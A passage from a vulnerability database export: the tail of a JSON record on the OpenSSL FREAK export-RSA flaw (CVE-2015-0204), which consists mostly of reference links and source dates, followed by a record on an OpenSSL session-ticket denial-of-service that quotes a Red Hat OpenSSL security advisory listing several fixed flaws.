"http://www-01.ibm.com/support/docview.wss?uid=swg21960634" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963126" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21963526" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21964496" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21964610" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=swg21964625" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964730" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21966177" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21698818" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21883857" }, { "trust": 0.3, "url": "https://aix.software.ibm.com/aix/efixes/security/openssl_advisory12.asc" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/java_april2015_advisory.asc" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960515" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/32cfd-51ec67c0f86df/cert_security_mini-_bulletin_xrx15ah_for_p3600_v1-0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/30b1a-51f527aa71c0f/cert_security_mini-_bulletin_xrx15aj_for_wc3550_v1-0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/38cb3-51fe2768b1a74/cert_security_mini-_bulletin_xrx15ak_for_p3635mfp_v1-0.pdf" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/3497e-521fff9cafe80/cert_security_mini-_bulletin_xrx15am_for_p30xx_p3260_wc30xx_wc3225_v1-0.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902444" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902710" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960815" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957999" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959525" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965448" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903747" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964850" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957855" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958902" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21959575" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959252" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699271" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1020751" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101008182" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101011698" }, { "trust": 0.3, "url": "https://www.openssl.org/news/vulnerabilities.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "https://downloads.avaya.com/css/p8/documents/101011712" }, { "trust": 0.3, "url": "https://service.sap.com/sap/support/notes/2163306" }, { "trust": 0.3, "url": "https://www.alienvault.com/forums/discussion/4475/security-advisory-alienvault-v4-15-1-addresses-twenty-20-vulnerabilities" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903636" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963783" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005351" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963964" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903396" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967539" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903541" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903029" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957813" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965485" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964027" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903651" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958017" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903247" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903256" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903516" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965920" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961223" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903031" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965404" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962552" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958919" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21958918" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957919" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962838" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21962837" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960075" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902765" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902862" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902866" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959306" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903394" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957779" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21961493" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005328" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098593" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21964236" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21957995" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21903299" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005159" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699938" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902635" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700163" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097912" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902694" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21902277" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21697291" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699235" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097796" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700168" }, { "trust": 0.3, "url": "https://www-304.ibm.com/support/docview.wss?uid=swg21697162" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097823" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700411" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701354" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21700028" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022100" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005158" }, { "trust": 0.3, "url": "http://www.splunk.com/view/sp-caaanxd" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1005370" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009328" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21960460" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21963609" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21965940" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967498" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967709" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21967962" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21968485" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21968869" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21695985" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1022074" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21701453" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5098358" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21959002" }, { "trust": 0.3, "url": "https://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5097360" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699052" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699810" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21699069" }, { "trust": 0.3, "url": "https://www.xerox.com/download/security/security-bulletin/2e28e-523433d609b1d/cert_security_mini-_bulletin_xrx15ap_for_wc6400_v1-0.pdf" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0288" }, { "trust": 0.3, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/" }, { "trust": 0.3, "url": "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-0204" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0287" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0289" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0293" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.2, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0207" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0285" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0208" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/310.html" }, { "trust": 0.1, "url": "https://access.redhat.com/errata/rhsa-2015:0066" }, { "trust": 0.1, "url": "https://github.com/felmoltor/freakvulnchecker" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=37722" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/2459-1/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0289" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0209" }, { "trust": 0.1, "url": "http://openssl.org/news/secadv_20150319.txt" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0288" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0287" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0293" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0286" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-c54de3da8602433283d55e7369" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0291" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1787" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-676ddad17a06423589ee8889d0" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0290" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0292" }, { "trust": 0.1, "url": "http://www.hp.com/swpublishing/mtx-72d53359c85340f899e81986a7" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-5387" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2106" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2105" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.1, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3110" }, { "trust": 0.1, "url": "https://access.redhat.com/site/documentation/en-us/jboss_enterprise_web_server/2/html-single/installation_guide/index.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5387" }, { "trust": 0.1, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_web_server/2.1/html/2.1.1_release_notes/index.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.1, "url": "https://access.redhat.com/security/vulnerabilities/httpoxy" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3110" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-3570" }, { "trust": 0.1, "url": "https://access.redhat.com/site/documentation/" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=webserver\u0026downloadtype=distributions\u0026version=2.1.1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5432" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5433" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0235" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe" }, { "trust": 0.1, "url": "http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all-" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8275" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3570" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3571" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0206" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-0205" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3572" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3569" }, { "trust": 0.1, "url": "https://h20566.www2.hp.com/portal/site/hpsc/patch/home" }, { "trust": 0.1, "url": "http://h71000.www7.hp.com/openvms/products/ssl/ssl.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0118" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8142" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0226" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0231" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3523" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9653" }, { "trust": 0.1, "url": "http://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04746490\u0026la" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9705" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0232" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1692" }, { "trust": 0.1, "url": "http://www.hp.com/go/insightupdates" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-0248" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9427" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2010-5107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0231" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652" }, { "trust": 0.1, "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c04762744" }, { "trust": 0.1, "url": "https://h20392.www2.hp.com/portal/swdepot/displayproductinfo.do?productnumber" }, { "trust": 0.1, "url": "https://www.hp.com/go/swa" } ], "sources": [ { "db": "CERT/CC", "id": "VU#243585" }, { "db": "VULMON", "id": "CVE-2015-0204" }, { "db": "BID", "id": "71936" }, { "db": "JVNDB", "id": "JVNDB-2015-001672" }, { "db": "JVNDB", "id": "JVNDB-2015-001009" }, { "db": "PACKETSTORM", "id": "131045" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "138473" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "130545" }, { "db": "CNNVD", "id": "CNNVD-201501-171" }, { "db": "NVD", "id": "CVE-2015-0204" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#243585" }, { "db": "VULMON", "id": "CVE-2015-0204" }, { "db": "BID", "id": "71936" }, { "db": "JVNDB", "id": "JVNDB-2015-001672" }, { "db": "JVNDB", "id": "JVNDB-2015-001009" }, { "db": "PACKETSTORM", "id": "131045" }, { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "138473" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "129870" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "130545" }, { "db": "CNNVD", "id": "CNNVD-201501-171" }, { "db": "NVD", "id": "CVE-2015-0204" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-03-06T00:00:00", "db": "CERT/CC", "id": "VU#243585" }, { "date": "2015-01-09T00:00:00", "db": "VULMON", "id": "CVE-2015-0204" }, { "date": "2015-01-08T00:00:00", "db": "BID", "id": "71936" }, { "date": "2015-03-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-001672" }, { "date": "2015-01-13T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-001009" }, { "date": "2015-03-27T20:43:39", "db": "PACKETSTORM", "id": "131045" }, { "date": "2015-08-26T01:33:25", "db": "PACKETSTORM", "id": "133318" }, { "date": "2016-08-22T23:25:00", "db": "PACKETSTORM", "id": "138473" }, { "date": "2015-08-26T01:33:18", "db": "PACKETSTORM", "id": "133317" }, { "date": "2015-03-24T17:05:09", "db": "PACKETSTORM", "id": "130987" }, { "date": "2015-01-09T17:43:35", "db": "PACKETSTORM", "id": "129870" }, { "date": "2015-04-14T18:54:44", "db": "PACKETSTORM", "id": "131408" }, { "date": "2015-08-26T01:35:08", "db": "PACKETSTORM", "id": "133325" }, { "date": "2015-02-26T17:13:09", "db": "PACKETSTORM", "id": "130545" }, { "date": "2015-01-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201501-171" }, { "date": "2015-01-09T02:59:10.287000", "db": "NVD", "id": "CVE-2015-0204" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-10-27T00:00:00", "db": "CERT/CC", "id": "VU#243585" }, { "date": "2018-07-19T00:00:00", "db": "VULMON", "id": "CVE-2015-0204" }, { "date": "2018-10-08T07:00:00", "db": "BID", "id": "71936" }, { "date": "2017-03-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-001672" }, { "date": "2017-03-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-001009" }, { "date": "2022-02-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201501-171" }, { "date": "2018-07-19T01:29:01.700000", "db": "NVD", "id": "CVE-2015-0204" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "130545" }, { "db": "CNNVD", "id": "CNNVD-201501-171" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SSL/TLS implementations accept export-grade RSA keys (FREAK attack)", "sources": [ { "db": "CERT/CC", "id": "VU#243585" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "encryption problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201501-171" } ], "trust": 0.6 } }
var-201609-0347
Vulnerability from variot
The tls_decrypt_ticket function in ssl/t1_lib.c in OpenSSL before 1.1.0 does not consider the HMAC size during validation of the ticket length, which allows remote attackers to cause a denial of service via a ticket that is too short. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to cause a denial-of-service condition. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2016:1940-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html Issue date: 2016-09-27 CVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 =====================================================================
- Summary:
An update for openssl is now available for Red Hat Enterprise Linux 6 and Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library.
Security Fix(es):
-
A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)
-
It was discovered that OpenSSL did not always use constant time operations when computing Digital Signature Algorithm (DSA) signatures. A local attacker could possibly use this flaw to obtain a private DSA key belonging to another user or service running on the same system. (CVE-2016-2178)
-
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory. (CVE-2016-2179)
-
A flaw was found in the Datagram TLS (DTLS) replay protection implementation in OpenSSL. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL to reject further packets sent from a DTLS client over an established DTLS connection. (CVE-2016-2181)
-
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. An attacker able to make an application using OpenSSL to process a large BIGNUM could cause the application to crash or, possibly, execute arbitrary code. (CVE-2016-2182)
-
A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183)
This update mitigates the CVE-2016-2183 issue by lowering priority of DES cipher suites so they are not preferred over cipher suites using AES. For compatibility reasons, DES cipher suites remain enabled by default and included in the set of cipher suites identified by the HIGH cipher string. Future updates may move them to MEDIUM or not enable them by default.
-
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. A remote attacker could use this flaw to crash a TLS server using OpenSSL if it used SHA-512 as HMAC for session tickets. (CVE-2016-6302)
-
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)
-
An out of bounds read flaw was found in the way OpenSSL formatted Public Key Infrastructure Time-Stamp Protocol data for printing. An attacker could possibly cause an application using OpenSSL to crash if it printed time stamp data from the attacker. (CVE-2016-2180)
-
Multiple out of bounds read flaws were found in the way OpenSSL handled certain TLS/SSL protocol handshake messages. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL. (CVE-2016-6306)
Red Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304 and CVE-2016-6306; and Karthikeyan Bhargavan (Inria) and GaA<<tan Leurent (Inria) as the original reporters of CVE-2016-2183.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
